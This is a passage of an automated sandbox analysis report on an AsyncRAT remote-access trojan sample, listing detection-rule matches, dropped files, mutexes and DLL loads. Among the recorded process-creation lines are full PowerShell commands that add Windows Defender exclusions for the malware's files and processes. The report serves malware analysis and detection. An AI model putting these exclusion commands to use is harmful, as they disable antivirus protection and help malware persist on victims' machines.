                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD347726D310_2_00007FFD347726D3
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD3477B7DC10_2_00007FFD3477B7DC
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFD34785CFA13_2_00007FFD34785CFA
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFD3478608113_2_00007FFD34786081
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFD3478B9FA13_2_00007FFD3478B9FA
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFD347889F213_2_00007FFD347889F2
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFD34788E0513_2_00007FFD34788E05
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFD34789F2013_2_00007FFD34789F20
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFD34785BF213_2_00007FFD34785BF2
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFD3478B81C13_2_00007FFD3478B81C
                      Source: NzEsfIiAc0.exe, 00000000.00000000.2148971109.0000000000262000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameXClient.exe4 vs NzEsfIiAc0.exe
                      Source: NzEsfIiAc0.exeBinary or memory string: OriginalFilenameXClient.exe4 vs NzEsfIiAc0.exe
                      Source: NzEsfIiAc0.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: NzEsfIiAc0.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 0.0.NzEsfIiAc0.exe.260000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000000.00000000.2148971109.0000000000262000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: NzEsfIiAc0.exe, Helper.csCryptographic APIs: 'TransformFinalBlock'
                      Source: NzEsfIiAc0.exe, Helper.csCryptographic APIs: 'TransformFinalBlock'
                      Source: NzEsfIiAc0.exe, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                      Source: XClient.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                      Source: XClient.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                      Source: XClient.exe.0.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                      Source: NzEsfIiAc0.exe, Settings.csBase64 encoded string: 'hOxd/rlHdvNoRGt/znUYrVLMnalcZ1Qd1agf8L7Q678ZxLNapvp5QX2cq1fsDDBA'
                      Source: XClient.exe.0.dr, Settings.csBase64 encoded string: 'hOxd/rlHdvNoRGt/znUYrVLMnalcZ1Qd1agf8L7Q678ZxLNapvp5QX2cq1fsDDBA'
                      Source: XClient.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: XClient.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: NzEsfIiAc0.exe, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: NzEsfIiAc0.exe, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@13/20@2/2
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeFile created: C:\Users\user\AppData\Roaming\XClient.exeJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2084:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5504:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4560:120:WilError_03
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeMutant created: \Sessions\1\BaseNamedObjects\L1FeSdLNARHoL9fL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2912:120:WilError_03
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeFile created: C:\Users\user\AppData\Local\Temp\Log.tmpJump to behavior
                      Source: NzEsfIiAc0.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: NzEsfIiAc0.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: NzEsfIiAc0.exeReversingLabs: Detection: 81%
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeFile read: C:\Users\user\Desktop\NzEsfIiAc0.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\NzEsfIiAc0.exe "C:\Users\user\Desktop\NzEsfIiAc0.exe"
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\NzEsfIiAc0.exe'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'NzEsfIiAc0.exe'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\NzEsfIiAc0.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'NzEsfIiAc0.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: linkinfo.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: ntshrui.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: cscapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: avicap32.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: msvfw32.dllJump to behavior
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
